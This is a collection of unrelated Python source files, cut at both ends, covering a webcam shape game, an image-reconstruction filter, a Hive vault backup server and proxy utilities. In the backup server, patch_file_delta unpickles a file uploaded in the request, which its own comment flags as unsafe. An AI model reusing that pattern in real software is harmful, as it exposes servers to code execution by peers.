    missed the uppercase form) are parsed as hexadecimal; everything else
    is parsed as decimal.
    """
    return int(imm, 16) if imm[:2].lower() == '0x' else int(imm)
def get_section(raw, off, size):
    """Return the slice of *raw* starting at *off* and spanning *size* items."""
    end = off + size
    return raw[off:end]
|
import abc
from utils.mixins import RenderMixin, CheckMethodsMixin
class View(RenderMixin, CheckMethodsMixin, abc.ABC):
    """Abstract base view combining rendering and method-presence checking."""
    # Method names subclasses are expected to provide — presumably enforced by
    # CheckMethodsMixin via _check_class(); TODO confirm against utils.mixins.
    _methods = [
        'render',
    ]
    # Relative column widths for layout — assumption; verify in RenderMixin.
    _columns_width = [6, 3]
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Validate the subclass contract immediately on construction.
        self._check_class()
|
# coding: utf-8
from django.contrib import admin
from .models import Task,Attendance,Emergency
# Register your models here.
# Expose these models in the Django admin with the default ModelAdmin options.
admin.site.register(Task)
admin.site.register(Attendance)
admin.site.register(Emergency)
"""Game of ninja for geometric shapes."""
import numpy as np
import cv2
def dist(x1, x2, y1, y2):
    """Euclidean distance between (x1, y1) and (x2, y2).

    Works elementwise when given NumPy arrays.
    """
    dx = x2 - x1
    dy = y2 - y1
    return (dx ** 2. + dy ** 2.) ** 0.5
class Ninja:
    """Fruit-ninja style game state: circles fall down the frame and are
    removed when struck, either by mouse position or by optical-flow points."""

    frame_name = 'ninja'

    def __init__(self, width: int, height: int):
        self.shapes = []       # live shapes, as dicts (see add_circle)
        self.garbage = []      # shapes queued for removal on the next update()
        self.probability_shape_spawn = 0.05  # chance per tick of a new circle
        self.height = height
        self.width = width

    def update(self):
        """Advance one tick: move shapes, cull off-screen ones, maybe spawn,
        then sweep the garbage list."""
        for shape in self.shapes:
            shape['y'] += shape['vy']
            if shape['y'] > self.height:
                self.garbage.append(shape)
        if np.random.random() < self.probability_shape_spawn:
            x = int(np.random.random() * self.width)
            self.add_circle(x, 10)
        for shape in self.garbage:
            if shape in self.shapes:
                self.shapes.remove(shape)
        self.garbage = []

    def draw(self, frame: np.ndarray):
        """Render every live shape onto frame (in place)."""
        for shape in self.shapes:
            shape['draw'](frame, shape['y'])

    def check(self, mag, ang, frame):
        """Check if any of the shapes have been touched.

        (In the future, check if any have been sliced.)
        """
        ys, xs = np.nonzero(mag > 35)
        self.any_strike(xs, ys)
        for x, y in zip(xs, ys):
            cv2.circle(frame, (x, y), 5, (0, 255, 0), -1)

    def add_circle(self, x: int, r: int, color: tuple = (0, 0, 255), vy: int = 10):
        """Spawn a circle of radius r at column x, falling vy pixels per tick."""
        self.shapes.append({
            'x': x,
            'y': 0,
            'vy': vy,
            'draw': lambda frame, y: cv2.circle(frame, (x, y), r, color, -1),
            # Bug fix: the old `(dist(...) <= r).any()` crashed for scalar
            # (mouse) coordinates, since a plain Python bool has no .any().
            # np.any handles both scalars and arrays; comparing squared
            # distances keeps the test exact and avoids the sqrt.
            'any_touch': lambda px, py, shape: np.any(
                (px - shape['x']) ** 2 + (py - shape['y']) ** 2 <= r ** 2),
        })

    def any_strike(self, x, y):
        """Queue for removal every shape touched by point(s) (x, y)."""
        for shape in self.shapes:
            if shape['any_touch'](x, y, shape):
                self.garbage.append(shape)

    def on_mouse(self, event, x, y, flags, param):
        # Mouse position acts as a single scalar strike point.
        self.any_strike(x, y)

    def bind_mouse_callback(self):
        cv2.namedWindow(self.frame_name)
        cv2.setMouseCallback(self.frame_name, self.on_mouse)
if __name__ == '__main__':
    # NOTE(review): Ninja's signature is (width, height), but the frame below
    # is resized to (640, 420), i.e. width=640, height=420 — these arguments
    # look transposed; confirm the intended dimensions.
    game = Ninja(420, 640)
    cap = cv2.VideoCapture(0)  # default webcam
    game.bind_mouse_callback()
    while True:
        _, frame = cap.read()
        frame = cv2.resize(frame, (640, 420))
        game.update()
        game.draw(frame)
        cv2.imshow(game.frame_name, frame)
        # Quit on 'q'.
        if cv2.waitKey(1) & 0xff == ord('q'):
            break
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from numpy import array, linspace, meshgrid, pi, zeros, sin, sqrt, arctan2
from numpy import save as npsave
from numpy import load as npload
from numpy.fft import fft, ifft
from scipy.ndimage import geometric_transform as transform
import argparse
import os
import sys
import time
# NOTE: this script is Python 2 (`print >>file` statements and raw_input below).
parser = argparse.ArgumentParser(
    description="Applies a filter to an image reconstructed from its Polar Broken Ray transform.")
parser.add_argument("--in", "-i", dest="input", action="store",
                    help="Input file. Default: <stdin>.", default="-")
parser.add_argument("--out", "-o", dest="output", action="store",
                    help="Output file. Default: <stdout>.", default="-")
parser.add_argument("--roi", "-R", dest="roi",
                    action="store", help="Specify region of interest. Format: xmin:xmax:ymin:ymax")
parser.add_argument("--size", "-S", dest="size",
                    action="store", help="Specify desired size. Format width:height.")
parser.add_argument("--beta", "-b", dest="beta",
                    action="store", help="Filter parameter beta.", default=None)
parser.add_argument("--overwrite", "-y", dest="overwrite",
                    action='store_const', help="Overwrite output file, if it exists.", const=True)
parser.add_argument("--no-overwrite", "-n", dest="nooverwrite", action='store_const',
                    help="Do not overwrite output file, if it exists.", const=True)
args = parser.parse_args()
# Status messages go to stdout only when it is a terminal; otherwise stdout may
# carry the binary result, so messages are diverted to stderr.
msgout = sys.stdout if sys.stdout.isatty() else sys.stderr
# '-y' and '-n' are mutually exclusive.
if args.overwrite and args.nooverwrite:
    print >>sys.stderr, "Cannot specify both '-y' and '-n'!"
    sys.exit()
# Resolve the input stream: '-' means stdin, but reading raw binary from an
# interactive terminal is refused.
if args.input == "-":
    if sys.stdin.isatty():
        print >>sys.stderr, "Surely you are not typing the raw data into the terminal. Please specify input file, or pipe input from another program.\n"
        parser.print_help(sys.stderr)
        sys.exit()
    infile = sys.stdin
else:
    infile = open(args.input, "rb")
# Resolve the output target; when a named file already exists, honour -y/-n or
# prompt interactively.
if args.output == "-":
    if sys.stdout.isatty():
        print >>sys.stderr, "Cowardly refusing to write binary data to terminal. Please specify output file, or redirect output to a pipe.\n"
        parser.print_help(sys.stderr)
        sys.exit()
    outfile = sys.stdout
    print >>sys.stderr, "Writing data to <stdout>."
else:
    if os.path.exists(args.output):
        if args.nooverwrite:
            print >>sys.stderr, "Error: Output file '%s' exists. Terminating because '-n' was specified." % args.output
            sys.exit()
        elif args.overwrite:
            print >>msgout, "Warning: Output file '%s' exists. Overwriting because '-y' was specified." % args.output
        elif sys.stdin.isatty() and sys.stdout.isatty():
            overwrite = raw_input(
                "Warning: Output file '%s' exists. Do you wish to overwrite file? (Y/N) " % args.output)
            while overwrite.upper() not in ("Y", "N", "YES", "NO"):
                print >>msgout, "Invalid answer: '%s'" % overwrite
                overwrite = raw_input(
                    "Warning: Output file '%s' exists. Do you wish to overwrite file? (Y/N) " % args.output)
            if overwrite.upper() in ("Y", "YES"):
                print >>msgout, "Overwriting '%s'." % args.output
                print >>msgout, ""
            elif overwrite.upper() in ("N", "NO"):
                print >>msgout, "Operation aborted."
                sys.exit()
        else:
            print >>sys.stderr, "Operation aborted. Cowardly refusing to overwrite '%s'." % args.output
            sys.exit()
    # Note: here outfile holds the file *name*; it is opened later, just
    # before the result is written.
    outfile = args.output
# Input stream layout: three consecutive .npy records — tag, metadata, data.
tag = npload(infile)
metadata = npload(infile)
data = npload(infile)
if infile is not sys.stdin:
    infile.close()
# FFT along the theta axis (rows); the filter below is applied in this domain.
fdata = fft(data, axis=0)
# NOTE(review): the fft above runs before the 2-D shape check below; harmless
# for valid input, but malformed input may raise inside fft first.
if len(data.shape) != 2:
    print >>sys.stderr, "Expected a two-dimensional array. Got an array with shape %s instead." % (
        data.shape,)
    sys.exit()
# Human-readable names for numpy dtype kind codes, used in messages below.
kind_str = {
    "f": "floating point",
    "i": "integer",
    "u": "unsigned integer",
    "b": "boolean",
    "c": "complex"
}
# Only float/complex data can be filtered; reject integer and boolean arrays.
if data.dtype.kind in "iub":
    print >>sys.stderr, "Error: Data type '%s' not supported." % kind_str[
        data.dtype.kind]
    sys.exit()
# Metadata record holds the polar grid bounds.
(rmin, rmax, thetamin, thetamax) = metadata
H, W = data.shape
print >>msgout, u"Array information:"
print >>msgout, u"  %.5f ≤ r ≤ %.5f, W = %d, ∆r = %.5f" % \
    (rmin, rmax, W, (rmax - rmin) / (W - 1))
print >>msgout, u"  %.5f ≤ θ ≤ %.5f, H = %d, ∆θ = %.5f" % \
    (thetamin, thetamax, H, (thetamax - thetamin) / (H - 1))
print >>msgout, "Data type: %d-bit %s" % (
    8 * data.dtype.alignment, kind_str[data.dtype.kind])
# Parse --roi (xmin:xmax:ymin:ymax); the default ROI spans [0, rmax] on both
# axes. NOTE: the bare `except` clauses below swallow every exception type.
if args.roi is None:
    xmin = ymin = 0
    xmax = ymax = rmax
else:
    try:
        xmin, xmax, ymin, ymax = args.roi.split(":")
    except:
        print >>sys.stderr, "Bad parameter for roi. Expected colon-delimited list of four floating points or integers, got '%s' instead.\n" % args.roi
        parser.print_help(sys.stderr)
        sys.exit()
    try:
        xmin = float(xmin)
    except:
        print >>sys.stderr, "Bad parameter for xmin. Expected floating point or integer, got '%s' instead.\n" % xmin
        parser.print_help(sys.stderr)
        sys.exit()
    try:
        ymin = float(ymin)
    except:
        print >>sys.stderr, "Bad parameter for ymin. Expected floating point or integer, got '%s' instead.\n" % ymin
        parser.print_help(sys.stderr)
        sys.exit()
    try:
        xmax = float(xmax)
    except:
        print >>sys.stderr, "Bad parameter for xmax. Expected floating point or integer, got '%s' instead.\n" % xmax
        parser.print_help(sys.stderr)
        sys.exit()
    try:
        ymax = float(ymax)
    except:
        print >>sys.stderr, "Bad parameter for ymax. Expected floating point or integer, got '%s' instead.\n" % ymax
        parser.print_help(sys.stderr)
        sys.exit()
# Output size: default preserves the ROI aspect ratio at roughly 640x640
# pixels total; otherwise parse the explicit width:height pair.
if args.size is None:
    W_new = int(640 * sqrt((xmax - xmin) / (ymax - ymin)))
    H_new = int(640 * sqrt((ymax - ymin) / (xmax - xmin)))
else:
    try:
        W_new, H_new = args.size.split(":")
    except:
        print >>sys.stderr, "Bad parameter for size. Expected colon-delimited pair of integers, got '%s' instead.\n" % args.size
        parser.print_help(sys.stderr)
        sys.exit()
    try:
        W_new = int(W_new)
    except:
        print >>sys.stderr, "Bad parameter for width. Expected integer, got '%s' instead.\n" % W_new
        parser.print_help(sys.stderr)
        sys.exit()
    try:
        H_new = int(H_new)
    except:
        # NOTE(review): message says "width" but this validates the height.
        print >>sys.stderr, "Bad parameter for width. Expected integer, got '%s' instead.\n" % H_new
        parser.print_help(sys.stderr)
        sys.exit()
# Cartesian grid spacings (endpoints inclusive).
dx = (xmax - xmin) / (W_new - 1)
dy = (ymax - ymin) / (H_new - 1)
# Filter parameter: user-supplied, or defaulted from the pixel pitch.
if args.beta is not None:
    try:
        args.beta = float(args.beta)
    except ValueError:
        print >>sys.stderr, "Bad parameter for beta. Expected floating point or integer, got '%s' instead." % args.beta
        sys.exit()
else:
    args.beta = 2 * sqrt(dx * dy)
print >>msgout, u"Output array information:"
print >>msgout, u" %.5f ≤ x ≤ %.5f, W = %d, ∆x = %.5f" % \
(xmin, xmax, W_new, dx)
print >>msgout, u" %.5f ≤ y ≤ %.5f, H = %d, ∆y = %.5f" % \
(ymin, ymax, H_new, dy)
print >>msgout, u"Filter parameter: β = %.5f." % args.beta
N = linspace(0, H - 1, H)
N[H / 2 + 1:] -= H
R = linspace(rmin, rmax, W)
R, N = meshgrid(R, N)
mask = (abs(N) <= 2 * pi * R / args.beta) & (N != 0)
mult = zeros(R.shape)
mult[mask] = 2 * pi * R[mask] * \
sin(args.beta * N[mask] / (2 * pi * R[mask])) / (args.beta * N[mask])
mult[N == 0] = 1
filtered = ifft(fdata * mult, axis=0)
new_metadata = array((xmin, xmax, ymin, ymax))
class ProgressIndicator(object):
    """Callable percent-progress printer.

    Each call advances the counter and rewrites a single status line
    (carriage return, no newline) on msgout.
    """

    def __init__(self, done, progress=0, msgout=sys.stdout, msg="Progress"):
        self.done = done
        # Bug fix: the `progress` argument was previously ignored (the
        # attribute was always reset to 0).
        self.progress = progress
        self.msgout = msgout
        self.msg = msg

    def __call__(self, increment=1):
        """Advance by `increment` and repaint the status line."""
        self.progress += increment
        # write() instead of the old `print >>stream, ...,` statement keeps
        # this class usable from both Python 2 and Python 3.
        self.msgout.write("%s: %.2f%% done.\r" % (
            self.msg, self.progress * 100.0 / self.done))
        self.msgout.flush()
def polar2cartesian(outcoords, rmin, rmax, thetamin, thetamax, inputshape, xmin, xmax, ymin, ymax, outputshape, progress=None):
    """Coordinate mapping for converting a polar array to Cartesian
    coordinates (for use with scipy.ndimage.geometric_transform).

    outcoords is the (row, col) index in the Cartesian output array of shape
    `outputshape`; returns the corresponding fractional (theta, r) index in
    the polar input array of shape `inputshape`.
    """
    out_h, out_w = outputshape
    in_h, in_w = inputshape
    # Grid spacings on both grids (endpoints inclusive).
    step_x = (xmax - xmin) / (out_w - 1)
    step_y = (ymax - ymin) / (out_h - 1)
    step_r = (rmax - rmin) / (in_w - 1)
    step_t = (thetamax - thetamin) / (in_h - 1)
    row, col = outcoords
    x = xmin + col * step_x
    y = ymin + row * step_y
    r = sqrt(x ** 2 + y ** 2)
    # arctan2(0, 0) is ambiguous; pin the origin to theta = 0.
    theta = 0 if (x == 0 and y == 0) else arctan2(y, x)
    if progress and callable(progress):
        progress()
    return ((theta - thetamin) / step_t, (r - rmin) / step_r)
# Reconstruct the filtered polar data onto the Cartesian grid.
progress = ProgressIndicator(
    H_new * W_new, msgout=msgout, msg="Reconstructing to Cartesian grid")
kwargs = dict(outputshape=(H_new, W_new), inputshape=filtered.shape, xmin=xmin, xmax=xmax,
              ymin=ymin, ymax=ymax, rmin=rmin, rmax=rmax, thetamin=thetamin, thetamax=thetamax, progress=progress)
t0 = time.time()
# geometric_transform calls polar2cartesian once per output pixel to find the
# fractional polar source index; order=3 selects cubic spline interpolation.
new_data = transform(filtered.real, polar2cartesian, order=3, output_shape=(
    H_new, W_new), extra_keywords=kwargs)
print >>msgout, ""
print >>msgout, "Reconstruction done: %.2f seconds" % (time.time() - t0)
t0 = time.time()
print >>msgout, "Writing data to '%s'..." % args.output,
msgout.flush()
# outfile was left holding a file *name* when writing to a real file; open it now.
if args.output != "-":
    outfile = open(args.output, "wb")
# Output mirrors the input layout: tag record, metadata, then the array.
# NOTE(review): this writes the literal string "data" as the tag, whereas the
# input's tag was read from the stream — confirm the constant is intended.
npsave(outfile, "data")
npsave(outfile, new_metadata)
npsave(outfile, new_data)
if outfile is not sys.stdout:
    outfile.close()
print >>msgout, "%.2f seconds" % (time.time() - t0)
|
import webbrowser
from ..utils import coveralls_project_exists
def enable_coveralls(automatically_open_browser: bool):
    """Handle guided coveralls."""
    if coveralls_project_exists():
        # Nothing to do: the project is already registered on coveralls.
        return
    print("You still need to create the coveralls project.")
    if automatically_open_browser:
        input("Press enter to go to coveralls now.")
        webbrowser.open("https://coveralls.io/repos/new",
                        new=2, autoraise=True)
|
import pickle
import shutil
from pathlib import Path
from flask import request, Response
from hive.settings import hive_setting
from hive.util.auth import did_auth
from hive.util.common import deal_dir, get_file_md5_info, gene_temp_file_name, get_file_checksum_list, \
create_full_path_dir
from hive.util.constants import HIVE_MODE_DEV, BACKUP_ACCESS, CHUNK_SIZE, VAULT_BACKUP_SERVICE_USE_STORAGE
from hive.util.did_file_info import filter_path_root, get_dir_size
from hive.util.error_code import BAD_REQUEST, UNAUTHORIZED, SUCCESS, NOT_FOUND, CHECKSUM_FAILED, \
SERVER_MKDIR_ERROR, FORBIDDEN, SERVER_SAVE_FILE_ERROR, SERVER_PATCH_FILE_ERROR, SERVER_MOVE_FILE_ERROR
from hive.util.flask_rangerequest import RangeRequest
from hive.util.payment.vault_backup_service_manage import get_vault_backup_service, get_vault_backup_path, \
update_vault_backup_service_item
from hive.util.payment.vault_service_manage import can_access_backup
from hive.util.pyrsync import patchstream, gene_blockchecksums, rsyncdelta
from hive.util.vault_backup_info import *
from hive.util.server_response import ServerResponse
from hive.main.interceptor import post_json_param_pre_proc, did_post_json_param_pre_proc, pre_proc, \
did_get_param_pre_proc
import logging
logger = logging.getLogger("HiveInternal")
class HiveInternal:
    """Internal HTTP handlers for vault backup: whole-file transfer, checksum
    verification, and rsync-style (pyrsync) delta patching between nodes."""
    mode = HIVE_MODE_DEV

    def __init__(self):
        self.app = None
        self.response = ServerResponse("HiveInternal")
        self.backup_ftp = None

    def init_app(self, app, mode):
        """Bind the Flask app and ensure the backup root directory exists."""
        backup_path = Path(hive_setting.BACKUP_VAULTS_BASE_DIR)
        # Bug fix: `backup_path.exists` (no parentheses) is a bound method and
        # therefore always truthy, so the directory was never created here.
        if not backup_path.exists():
            create_full_path_dir(backup_path)
        self.app = app
        HiveInternal.mode = mode

    def backup_save_finish(self):
        """Verify the uploaded backup against the client's checksum list and
        record the vault's storage usage."""
        did, content, err = did_post_json_param_pre_proc(self.response, "checksum_list")
        if err:
            return err
        checksum_list = content["checksum_list"]
        backup_path = get_vault_backup_path(did)
        if not backup_path.exists():
            return self.response.response_err(NOT_FOUND, f"{did} backup vault not found")
        backup_checksum_list = get_file_checksum_list(backup_path)
        for checksum in checksum_list:
            if checksum not in backup_checksum_list:
                return self.response.response_err(CHECKSUM_FAILED, f"{did} backup file checksum failed")
        # get_dir_size accumulates onto its second argument.
        total_size = get_dir_size(backup_path.as_posix(), 0.0)
        update_vault_backup_service_item(did, VAULT_BACKUP_SERVICE_USE_STORAGE, total_size)
        return self.response.response_ok()

    def backup_restore_finish(self):
        """Return the stored backup's checksum list so the client can verify a
        completed restore."""
        did, content, err = did_post_json_param_pre_proc(self.response)
        if err:
            return err
        backup_path = get_vault_backup_path(did)
        if not backup_path.exists():
            return self.response.response_err(NOT_FOUND, f"{did} backup vault not found")
        backup_checksum_list = get_file_checksum_list(backup_path)
        data = {"checksum_list": backup_checksum_list}
        return self.response.response_ok(data)

    def get_backup_service(self):
        """Return the caller's backup service document, creating the backup
        directory on first access."""
        did, content, err = did_get_param_pre_proc(self.response)
        if err:
            return self.response.response_err(UNAUTHORIZED, "Backup internal backup_communication_start auth failed")
        # check backup service exist
        info = get_vault_backup_service(did)
        if not info:
            return self.response.response_err(BAD_REQUEST, "There is no backup service of " + did)
        backup_path = get_vault_backup_path(did)
        if not backup_path.exists():
            create_full_path_dir(backup_path)
        # Strip the internal database id before returning the document.
        del info["_id"]
        data = {"backup_service": info}
        return self.response.response_ok(data)

    def get_backup_files(self):
        """List every backup file as [md5, vault-relative path] pairs."""
        did, content, err = did_get_param_pre_proc(self.response, access_backup=BACKUP_ACCESS)
        if err:
            return self.response.response_err(UNAUTHORIZED, "Backup internal get_transfer_files auth failed")
        backup_path = get_vault_backup_path(did)
        if not backup_path.exists():
            # Bug fix: the empty response was built but never returned, so the
            # code fell through and walked a non-existent directory.
            return self.response.response_ok({"backup_files": list()})
        file_md5_gene = deal_dir(backup_path.as_posix(), get_file_md5_info)
        file_md5_list = list()
        for md5 in file_md5_gene:
            # md5 is (digest, absolute path); store the path relative to the vault root.
            md5_info = [md5[0], Path(md5[1]).relative_to(backup_path).as_posix()]
            file_md5_list.append(md5_info)
        return self.response.response_ok({"backup_files": file_md5_list})

    def put_file(self):
        """Stream the request body into the named backup file, writing to a
        temp file first and replacing the target only on success."""
        did, content, response = did_get_param_pre_proc(self.response, "file", access_backup=BACKUP_ACCESS)
        if response is not None:
            return response
        file_name = filter_path_root(content["file"])
        backup_path = get_vault_backup_path(did)
        full_path_name = (backup_path / file_name).resolve()
        if not full_path_name.parent.exists():
            if not create_full_path_dir(full_path_name.parent):
                return self.response.response_err(SERVER_MKDIR_ERROR,
                                                  "internal put_file error to create dir:" + full_path_name.parent.as_posix())
        temp_file = gene_temp_file_name()
        try:
            with open(temp_file, "bw") as f:
                while True:
                    chunk = request.stream.read(CHUNK_SIZE)
                    if len(chunk) == 0:
                        break
                    f.write(chunk)
        except Exception as e:
            logger.error(f"exception of put_file error is {str(e)}")
            return self.response.response_err(SERVER_SAVE_FILE_ERROR, f"Exception: {str(e)}")
        if full_path_name.exists():
            full_path_name.unlink()
        shutil.move(temp_file.as_posix(), full_path_name.as_posix())
        return self.response.response_ok()

    def __get_backup_file_check(self, resp):
        """Authenticate the caller and resolve the 'file' query arg to an
        existing regular file. Returns (resp, path) on success, or
        (resp-with-error-status, None) on failure."""
        did, app_id = did_auth()
        if did is None:
            resp.status_code = UNAUTHORIZED
            return resp, None
        r, msg = can_access_backup(did)
        if r != SUCCESS:
            resp.status_code = r
            return resp, None
        file_name = filter_path_root(request.args.get('file'))
        backup_path = get_vault_backup_path(did)
        file_full_name = (backup_path / file_name).resolve()
        if not file_full_name.exists():
            resp.status_code = NOT_FOUND
            return resp, None
        if not file_full_name.is_file():
            resp.status_code = FORBIDDEN
            return resp, None
        return resp, file_full_name

    def get_file(self):
        """Serve a backup file with HTTP range-request support."""
        resp = Response()
        resp, file_full_name = self.__get_backup_file_check(resp)
        if not file_full_name:
            return resp
        size = file_full_name.stat().st_size
        with open(file_full_name, 'rb') as f:
            etag = RangeRequest.make_etag(f)
        # datetime presumably comes from the star import of
        # hive.util.vault_backup_info — confirm.
        last_modified = datetime.utcnow()
        data = RangeRequest(open(file_full_name, 'rb'),
                            etag=etag,
                            last_modified=last_modified,
                            size=size).make_response()
        return data

    def move_file(self, is_copy):
        """Move (or copy, when is_copy) a file within the caller's vault;
        an existing destination is overwritten."""
        did, content, response = did_post_json_param_pre_proc(self.response, "src_file", "dst_file",
                                                              access_backup=BACKUP_ACCESS)
        if response is not None:
            return response
        src_name = filter_path_root(content.get('src_file'))
        dst_name = filter_path_root(content.get('dst_file'))
        backup_path = get_vault_backup_path(did)
        src_full_path_name = (backup_path / src_name).resolve()
        dst_full_path_name = (backup_path / dst_name).resolve()
        if not src_full_path_name.exists():
            return self.response.response_err(NOT_FOUND, "src_name not exists")
        if dst_full_path_name.exists():
            dst_full_path_name.unlink()
        dst_parent_folder = dst_full_path_name.parent
        if not dst_parent_folder.exists():
            if not create_full_path_dir(dst_parent_folder):
                return self.response.response_err(SERVER_MKDIR_ERROR, "move_file make dst parent path dir error")
        try:
            if is_copy:
                shutil.copy2(src_full_path_name.as_posix(), dst_full_path_name.as_posix())
            else:
                shutil.move(src_full_path_name.as_posix(), dst_full_path_name.as_posix())
        except Exception as e:
            logger.error(f"exception of move_file error is {str(e)}")
            return self.response.response_err(SERVER_MOVE_FILE_ERROR, "Exception:" + str(e))
        return self.response.response_ok()

    def delete_file(self):
        """Delete a file from the caller's backup vault (idempotent)."""
        did, content, response = did_get_param_pre_proc(self.response, "file", access_backup=BACKUP_ACCESS)
        if response is not None:
            return response
        file_name = filter_path_root(content.get('file'))
        backup_path = get_vault_backup_path(did)
        full_path_name = (backup_path / file_name).resolve()
        if full_path_name.exists():
            full_path_name.unlink()
        # todo delete all empty path dir
        return self.response.response_ok()

    def get_file_patch_hash(self):
        """Stream the rsync block checksums of a backup file."""
        resp = Response()
        resp, file_full_name = self.__get_backup_file_check(resp)
        if not file_full_name:
            return resp
        # gene_blockchecksums is a generator; Flask consumes it while
        # streaming, which also drains the open file handle.
        open_file = open(file_full_name, 'rb')
        resp = Response(gene_blockchecksums(open_file, blocksize=CHUNK_SIZE))
        resp.status_code = SUCCESS
        return resp

    def patch_file_delta(self):
        """Apply an uploaded pyrsync delta to a backup file: save the delta,
        patch into a temp file, then atomically replace the original."""
        resp = Response()
        resp, file_full_name = self.__get_backup_file_check(resp)
        if not file_full_name:
            return resp
        patch_delta_file = gene_temp_file_name()
        try:
            with open(patch_delta_file, "bw") as f:
                while True:
                    chunk = request.stream.read(CHUNK_SIZE)
                    if len(chunk) == 0:
                        break
                    f.write(chunk)
        except Exception as e:
            logger.error(f"exception of post_file_patch_delta read error is {str(e)}")
            resp.status_code = SERVER_SAVE_FILE_ERROR
            return resp
        # NOTE(review): pickle.load on request-supplied data is unsafe for
        # untrusted peers; access is gated by did_auth/can_access_backup above.
        with open(patch_delta_file, "rb") as f:
            delta_list = pickle.load(f)
        try:
            new_file = gene_temp_file_name()
            with open(file_full_name, "br") as unpatched:
                with open(new_file, "bw") as save_to:
                    unpatched.seek(0)
                    patchstream(unpatched, save_to, delta_list)
            patch_delta_file.unlink()
            if file_full_name.exists():
                file_full_name.unlink()
            shutil.move(new_file.as_posix(), file_full_name.as_posix())
        except Exception as e:
            logger.error(f"exception of post_file_patch_delta patch error is {str(e)}")
            resp.status_code = SERVER_PATCH_FILE_ERROR
            return resp
        resp.status_code = SUCCESS
        return resp

    def get_file_delta(self):
        """Compute and serve the pyrsync delta between a backup file and the
        block checksums posted in the request body."""
        resp = Response()
        resp, file_full_name = self.__get_backup_file_check(resp)
        if not file_full_name:
            return resp
        # Request body: one "<weak>,<strong>" checksum pair per line.
        hashes = list()
        for line in request.get_data().split(b'\n'):
            if not line:
                continue
            pair = line.split(b',')
            hashes.append((int(pair[0]), pair[1].decode("utf-8")))
        with open(file_full_name, "rb") as f:
            delta_list = rsyncdelta(f, hashes, blocksize=CHUNK_SIZE)
        patch_delta_file = gene_temp_file_name()
        try:
            with open(patch_delta_file, "wb") as f:
                pickle.dump(delta_list, f)
        except Exception as e:
            # Consistency fix: use this module's logger instead of a
            # separately named "HiveBackup" logger.
            logger.error(
                f"get_file_delta dump {file_full_name} delta exception:{str(e)}")
            patch_delta_file.unlink()
            resp.status_code = SERVER_SAVE_FILE_ERROR
            return resp
        size = patch_delta_file.stat().st_size
        with open(patch_delta_file, 'rb') as f:
            etag = RangeRequest.make_etag(f)
        last_modified = datetime.utcnow()
        data = RangeRequest(open(patch_delta_file, 'rb'),
                            etag=etag,
                            last_modified=last_modified,
                            size=size).make_response()
        # The temp file is unlinked while the response still holds an open
        # handle; on POSIX the data stays readable until that handle closes.
        patch_delta_file.unlink()
        # Cleanup: demoted the stray debug print to a debug-level log entry.
        logger.debug("patch file name:" + patch_delta_file.as_posix())
        return data
|
import collections.abc
import logging
import os
import pkgutil
from collections import namedtuple
from urllib.request import _parse_proxy
log = logging.getLogger(__name__)
def get_upstream_proxy(options):
    """Get the upstream proxy configuration from the options dictionary.

    This will be overridden with any configuration found in the environment
    variables HTTP_PROXY, HTTPS_PROXY, NO_PROXY

    The configuration will be returned as a dictionary with keys 'http',
    'https' and 'no_proxy'. The value of the 'http' and 'https' keys will
    be a named tuple with the attributes:

        scheme, username, password, hostport

    Note that the keys will only be present in the dictionary when relevant
    proxy configuration exists.

    Args:
        options: The selenium wire options.
    Returns: A dictionary.
    """
    # Note: .pop() deliberately removes the 'proxy' key from the caller's dict.
    proxy_options = (options or {}).pop('proxy', {})
    env_settings = (
        ('http', os.environ.get('HTTP_PROXY')),
        ('https', os.environ.get('HTTPS_PROXY')),
        ('no_proxy', os.environ.get('NO_PROXY')),
    )
    merged = {}
    for key, value in env_settings:
        if value:
            merged[key] = value
    # Explicit options take precedence over the environment.
    merged.update(proxy_options)
    conf = namedtuple('ProxyConf', 'scheme username password hostport')
    # Parse each upstream proxy URL into (scheme, username, password, hostport)
    # for ease of access.
    for proxy_type in ('http', 'https'):
        if merged.get(proxy_type) is not None:
            merged[proxy_type] = conf(*_parse_proxy(merged[proxy_type]))
    return merged
def extract_cert(cert_name='ca.crt'):
    """Extracts the root certificate to the current working directory."""
    try:
        cert = pkgutil.get_data(__package__, cert_name)
    except FileNotFoundError:
        log.error("Invalid certificate '{}'".format(cert_name))
        return
    destination = os.path.join(os.getcwd(), cert_name)
    with open(destination, 'wb') as out:
        out.write(cert)
    log.info('{} extracted. You can now import this into a browser.'.format(
        cert_name))
def is_list_alike(container):
    """Return True for sequence types other than strings (lists, tuples, ...)."""
    if isinstance(container, str):
        return False
    return isinstance(container, collections.abc.Sequence)
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import collections
import json
import os
import secrets
import shutil
import string
import threading
import time
from multiprocessing.pool import ThreadPool
import yaml
from maro.cli.grass.executors.grass_executor import GrassExecutor
from maro.cli.grass.utils.file_synchronizer import FileSynchronizer
from maro.cli.grass.utils.master_api_client import MasterApiClientV1
from maro.cli.grass.utils.params import ContainerStatus, GrassParams, GrassPaths, NodeStatus
from maro.cli.utils.azure_controller import AzureController
from maro.cli.utils.deployment_validator import DeploymentValidator
from maro.cli.utils.details_reader import DetailsReader
from maro.cli.utils.details_writer import DetailsWriter
from maro.cli.utils.name_creator import NameCreator
from maro.cli.utils.params import GlobalParams, GlobalPaths
from maro.utils.exception.cli_exception import BadRequestError
from maro.utils.logger import CliLogger
logger = CliLogger(name=__name__)
class GrassAzureExecutor(GrassExecutor):
"""Executor for grass/azure mode.
See https://maro.readthedocs.io/en/latest/key_components/orchestration.html for reference.
"""
    def __init__(self, cluster_name: str):
        """Load the named cluster's saved details and cache cloud/connection settings."""
        super().__init__(cluster_details=DetailsReader.load_cluster_details(cluster_name=cluster_name))
        # Cloud configs
        self.subscription = self.cluster_details["cloud"]["subscription"]
        self.resource_group = self.cluster_details["cloud"]["resource_group"]
        self.location = self.cluster_details["cloud"]["location"]
        self.default_username = self.cluster_details["cloud"]["default_username"]
        # Connection configs
        self.ssh_port = self.cluster_details["connection"]["ssh"]["port"]
        self.api_server_port = self.cluster_details["connection"]["api_server"]["port"]
    # maro grass create
    @staticmethod
    def create(create_deployment: dict) -> None:
        """Create MARO Cluster with create_deployment.
        Args:
            create_deployment (dict): create_deployment of grass/azure. See lib/deployments/internal for reference.
        Returns:
            None.
        """
        logger.info("Creating cluster")
        # Get standardized cluster_details
        cluster_details = GrassAzureExecutor._standardize_cluster_details(create_deployment=create_deployment)
        cluster_name = cluster_details["name"]
        # Refuse to create over an existing local cluster folder.
        if os.path.isdir(f"{GlobalPaths.ABS_MARO_CLUSTERS}/{cluster_name}"):
